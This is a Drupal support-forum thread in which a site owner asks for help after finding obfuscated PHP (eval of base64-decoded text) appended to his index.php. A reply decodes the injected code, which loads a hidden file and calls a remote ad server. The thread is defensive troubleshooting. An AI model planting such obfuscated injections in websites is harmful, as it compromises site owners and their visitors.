I'm currently running Drupal 5.3 (will upgrade to 5.6 today).

Twice so far, changes have been made to my index.php file.

Once the end tag was removed and today I noticed that the following code was added to the bottom of the file:

<?
eval
(base64_decode
("ZWNobyBldmFsKGJhc2U2NF9kZWNvZGUoIkNtVnljbTl5WDNKbGNHOXlkR2x1Wnlnd0tUc0tjbVZ4ZFdseVpTZ25Mbmh0YkNjcE93b2tlRzFzY25CalltRnVibVZ5SUQwZ2JtVjNJSEJvY0VGa2MxOVliV3hTY0dNb0ozQndZekV3TUM1cGJtWnZKeXdnSnk5d2FIQkJaSE5PSnlrN0NpUjRiV3h5Y0dOaVlXNXVaWEl0UG5acFpYY29KM3B2Ym1VNk1USW5MQ0F3TENBbkp5d2dKeWNzSUNjd0p5azdDZz09IikpOyA
=")); ?>

On both occasions I noticed that a user had been created even though I have set the option for administrator approval of new users.

The last time this happened I immediately upgraded to 5.3.

Any idea what could be doing this?

Also, I use the site as an informational site and don't need to add users.
Is there any way that I can completely shut down addition of new users?

Thanks!

John W Babiak

Comments

mooffie’s picture

I've seen a similar report before. There's a method here, and perhaps the security team would know something about it.

eval
(base64_decode [...]

If you run this string, twice, in a base64 decoder you get:

error_reporting(0);
require('.xml');
$xmlrpcbanner = new phpAds_XmlRpc('ppc100.info', '/phpAdsN');
$xmlrpcbanner->view('zone:12', 0, '', '', '0');

(I typed some of this in google, and did a whois, but couldn't find something useful.) Note that the cracker installed a '.xml' file there and it's worth checking who's the owner.

user had been created even though I have set the option for administrator approval of new users.
[...]
Is there any way that I can completely shut down addition of new users?

Once the cracker can run PHP code on your account, and he can, whatever you do in Drupal's administration is futile.

Chad_Dupuis’s picture

I've had this happen a couple times fairly recently on a few different sites. In each case it was a server level exploit and not something related to drupal specifically as far as we could tell.